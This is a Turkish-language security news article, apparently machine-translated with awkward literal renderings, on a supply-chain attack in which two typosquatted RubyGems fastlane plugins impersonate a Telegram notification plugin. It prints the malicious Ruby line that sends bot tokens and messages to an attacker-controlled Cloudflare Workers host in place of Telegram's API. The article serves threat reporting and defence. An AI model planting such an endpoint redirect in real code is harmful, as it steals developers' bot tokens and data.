Rubygems ekosistemini hedefleyen sofistike bir tedarik zinciri saldırısı ortaya çıktı ve Vietnam’ın son Telegram yasağını çevreleyen jeopolitik gerginliklerden faydalandı ve hassas geliştirici kimlik bilgilerini ve iletişimini çaldı.
Kötü niyetli kampanya, meşru fastlane eklentilerini taklit etmek için tasarlanmış iki yazım hatası yakut mücevher içerir, telgraf API trafiğini saldırgan kontrollü altyapı yoluyla bot tokenlerini, mesaj içeriğini ve ekli dosyaları hasat etmek için sessizce yönlendirir.
Vietnam’ın 21 Mayıs 2025’te ülke çapında Telegram’ı engellemesini emretmesinden sadece birkaç gün sonra ortaya çıktığı için, bu saldırının zamanlaması özellikle ilgilidir.
.png
)
Kampanyanın arkasındaki tehdit oyuncusu, yasaktan etkilenen geliştiriciler arasında telgraf geçici çözümlerine olan artan talebi kullanmak için bu mücevherleri stratejik olarak “proxy” eklentileri olarak pazarladı.
Bu fırsatçı yaklaşım, siber suçluların hedeflenen tedarik zinciri saldırıları için jeopolitik olaylardan nasıl hızla uyum sağladığını göstermektedir.
Socket.Dev analistleri, kampanyayı tehdit araştırma ekibi aracılığıyla tanımladılar ve diğer adalarda yayınlanan iki kötü amaçlı mücevherleri ortaya çıkardılar.
Paketler Fastlane-Plugin-Telegram-proksi ve Fastlane-Plugin-Proxy_teleram, 600.000’den fazla indirme olan ve CI/CD borularından telgraf kanallarına dağıtım bildirimleri göndermek için yaygın olarak kullanılan meşru Fastlane-Plugin-Telegram projesini taklit etmek için tasarlanmıştır.
.webp)
Saldırının karmaşıklığı, minimal kod değişiklik yaklaşımında yatmaktadır. Tehdit oyuncusu orijinal projenin ReadMe’sini kopyaladı, kamu API’sını korudu ve sadece bir kritik değişiklik yaparken beklenen eklenti davranışını korudu.
Fastlane, imza anahtarları, serbest bırakma ikili ve çevre sırları da dahil olmak üzere hassas varlıkları işleyen CI/CD boru hatları içinde çalıştığı için etki, basit kimlik hırsızlığının çok ötesine uzanır.
Enfeksiyon mekanizmasının teknik analizi
Kötü niyetli taşlar, minimal kod değiştirme yoluyla maksimum etki elde ederek aldatıcı sadelikte bir masterclass’ı temsil eder.
Tehdit oyuncusu yaklaşımı, ağ trafiğini Telegram’ın meşru API uç noktasından saldırgan kontrollü bir komut ve kontrol sunucusuna yönlendiren tek bir kod satırını değiştirmeye odaklandı.
.webp)
Meşru Fastlane-Plugin-Telegram’da mesajlar, standart uç nokta kullanılarak doğrudan Telegram’ın resmi API’sına gönderilir:
uri = URI.parse("https://api.telegram.org/bot#{token}/sendMessage")Bununla birlikte, kötü niyetli sürümlerde, bu kritik çizginin yerini sabit kodlu bir C2 uç noktası ile değiştirdi:-
# Threat actor's proxy C2 endpoint; not Telegram
uri = URI.parse("https://rough-breeze-0c37[.]buidanhnam95[.]workers[.]dev/bot#{token}/sendMessage")Bu ince ikame, tehdit aktörünün eklentinin beklenen işlevini korurken bot tokenlerini, sohbet tanımlayıcıları, mesaj içeriği ve yüklenen dosyaları otomatik olarak yakalamasını sağlar.
Cloudflare çalışanlarında barındırılan kötü niyetli uç nokta, bot tokenlerini depolamamayı veya değiştirmemeyi iddia eden kendisini iyi huylu bir Telegram Bot API proxy olarak sunar.
Bununla birlikte, uygulama, meşru bir vekalet hizmetini karakterize edecek yayınlanmış kaynak kodu veya şeffaflık önlemleri olmadan tamamen opak olarak kalır.
Bu saldırı vektörünün kalıcılığı özellikle rahatsız edicidir, çünkü çalınan jetonlar manuel olarak iptal edilene kadar geçerli kalır ve kurban telgraf botlarına ve bunların ilişkili veri akışlarına yetkisiz erişim için bir pencere oluşturur.
Tehdit istihbarat aramasıyla tehdit araştırmalarını hızlandırın ve zenginleştirin! -> 50 Deneme Arama İsteği